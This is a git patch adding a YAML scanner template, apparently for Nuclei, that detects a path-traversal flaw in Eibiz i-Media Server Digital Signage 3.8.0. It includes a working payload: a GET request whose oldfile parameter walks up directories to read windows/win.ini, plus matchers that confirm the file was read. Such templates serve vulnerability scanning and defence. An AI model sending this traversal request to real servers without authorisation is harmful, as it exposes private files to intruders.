From 786b3f542ddb0f147fc6288c0f5cdc6b3e1d6552 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Thu, 18 Nov 2021 20:21:20 +0900 Subject: [PATCH] Create eibiz-server-3-8-0-lfi.yaml --- eibiz-server-3-8-0-lfi.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 eibiz-server-3-8-0-lfi.yaml diff --git a/eibiz-server-3-8-0-lfi.yaml b/eibiz-server-3-8-0-lfi.yaml new file mode 100644 index 0000000000..a0a6d83bf1 --- /dev/null +++ b/eibiz-server-3-8-0-lfi.yaml @@ -0,0 +1,23 @@ +id: eibiz-server-3-8-0-lfi + +info: + name: Eibiz i-Media Server Digital Signage 3.8.0 File Path Traversal + author: 0x_akoko + severity: high + description: An unauthenticated remote attacker can exploit this to view the contents of files located outside of the server's root directory. The issue can be triggered through the oldfile GET parameter. + tags: windows,lfi,eibiz + +requests: + - method: GET + path: + - "{{BaseURL}}/dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null" + + stop-at-first-match: true + matchers: + - type: word + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + part: body